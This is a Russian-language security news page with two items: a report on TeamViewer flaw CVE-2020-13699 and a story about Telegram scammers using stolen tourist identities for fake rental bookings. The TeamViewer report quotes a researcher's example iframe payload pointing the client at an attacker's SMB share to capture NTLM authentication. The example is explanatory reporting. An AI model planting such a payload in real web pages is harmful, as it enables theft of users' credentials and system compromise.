Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Опасная уязвимость в TeamViewer для Windows может привести к взлому паролей пользователей и, как следствие, к компрометации всей операционной системы. Получившую идентификатор CVE-2020-13699 брешь можно использовать удалённо.

Специалисты советуют особо присмотреться к этой проблеме безопасности, поскольку с приходом COVID-19 TeamViewer для удалённого доступа стали использовать гораздо чаще.

CVE-2020-13699 представляет собой путь поиска или элемент без кавычек. Другими словами, приложение некорректно обрабатывает кастомные URI-хендлеры. Это может привести к эксплуатации в момент посещения вредоносного сайта.

«Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL — iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'. Именно эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённую SMB-шару», — объяснил Джеффри Хофманн, специалист в области кибербезопасности из компании Praetorian.

«Windows при этом осуществит NTLM-аутентификацию и этот запрос злоумышленник может использовать для выполнения кода».

Для успешной атаки киберпреступнику не обязательно проходить процесс аутентификации. Тем не менее в настоящее время нет информации об эксплуатации этой уязвимости в реальных атаках.

Мошенники крадут личности туристов для обмана других путешественников

Облюбовавшие Telegram мошенники предлагают аренду жилья российским любителям отдыха за рубежом, используя ранее украденные личные данные других обманутых туристов. Тренд уже приобрел массовый характер.

Целью данной аферы является отъем денег под предлогом оплаты брони. Очередное свидетельство подобного мошенничества представлено в телеграм-канале «База».

Задумав поездку в Таиланд, жительница Тулы Анастасия обратилась за помощью к менеджеру из контактов Дарьи Ловчевой. Та предложила несколько вариантов проживания в Пхукете и посоветовала почитать отзывы в созданной ею профильной группе.

После выбора претендентка скинула свои паспортные данные и внесла предоплату в размере 30%. Когда ей сообщили о необходимости уплаты еще 50% стоимости аренды, россиянка заподозрила подвох и потребовала возврат, однако собеседница исчезла из чата.

Как выяснилось, мошеннический сервис гостеприимства объявился в мессенджере в результате кражи личности Дарьи Логачевой, совершенной при аналогичном бронировании тайского жилья. Новоявленная туристка из Тулы теперь переживает, что ее данные тоже могут быть использованы для обмана других путешественников.

Схожим образом злоумышленники крадут деньги у желающих отдохнуть во Вьетнаме, Франции, Италии, Индонезии. Менее изощренные мошеннические схемы, ориентированные на туристов, обычно используют обзвон либо фишинговые сайты, активно плодящиеся перед долгими праздниками и в сезон летних отпусков.

RSS: Новости на портале Anti-Malware.ru